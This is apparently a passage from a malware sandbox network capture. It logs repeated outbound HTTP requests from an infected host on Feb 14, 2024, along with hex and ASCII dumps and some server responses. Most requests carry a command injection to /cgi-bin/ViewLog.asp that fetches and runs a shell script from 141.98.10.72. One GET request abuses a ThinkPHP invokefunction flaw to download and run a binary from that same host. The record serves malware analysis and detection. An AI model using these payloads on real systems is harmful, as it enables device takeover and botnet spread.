3e 0a
                                                      Data Ascii: <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      366192.168.2.155273431.136.250.1958080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.226231098 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:44.857676983 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:46.105642080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:48.569669008 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:53.689440966 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:03.673234940 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:24.920530081 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:05.879336119 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      367192.168.2.154433831.136.172.548080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.227662086 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:44.857752085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:46.105648041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:48.825685024 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:53.945420980 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:03.929210901 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:24.920517921 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:05.879362106 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      368192.168.2.154522694.101.207.1348080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.250159025 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:45.509816885 CET21INHTTP/1.1
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      369192.168.2.153295694.121.194.1688080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.271795988 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      370192.168.2.155367888.203.250.10080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.339565039 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:44.582190037 CET50INHTTP/1.1 404 Not Found
                                                      Cache-control:no-cache
                                                      Feb 14, 2024 09:29:44.582202911 CET53INData Raw: 32 66 0d 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a
                                                      Data Ascii: 2fThe requested URL was not found on this server.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      371192.168.2.153413231.136.35.358080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.447119951 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:45.113670111 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:46.457717896 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:49.337759018 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:54.713438988 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:05.465147972 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:26.968646049 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:09.975440025 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      372192.168.2.155127695.230.222.2278080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.490695953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:44.735544920 CET1286INHTTP/1.1 200 OK
                                                      Content-type: text/html
                                                      Cache-Control: no-cache
                                                      X-Ses: none
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 20 3c 68 74 6d 6c 3e 20 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 2f 3e 20 3c 74 69 74 6c 65 3e 42 72 69 6e 64 69 73 69 54 58 20 2d 20 44 42 39 31 2d 54 58 3c 2f 74 69 74 6c 65 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 2e 63 73 73 22 2f 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 6d 61 69 6e 2e 63 73 73 22 2f 3e 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 73 65 73 2e 73 73 69 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 64 65 76 61 65 78 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 70 61 72 61 6d 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 2f 68 65 61 64 3e 20 3c 62 6f 64 79 20 6f 6e 6c 6f 61 64 3d 22 69 6e 69 74 28 29 3b 22 3e 20 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 36 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 20 7a 2d 69 6e 64 65 78 3a 20 31 30 30 30 3b 20 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 22 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 6d 75 73 74 20 73 75 70 70 6f 72 74 20 4a 61 76 61 53 63 72 69 70 74 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 75 73 65 20 61 6c 6c 20 70 61 67 65 73 20 6f 6e 20 74 68 69 73 20 64 65 76 69 63 65 21 3c 2f 68 36 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 20 3c 64 69 76 20 69 64 3d 22 6f 75 74 65 72 22 20 63 6c 61 73 73 3d 22 66 72 61 6d 65 20 64 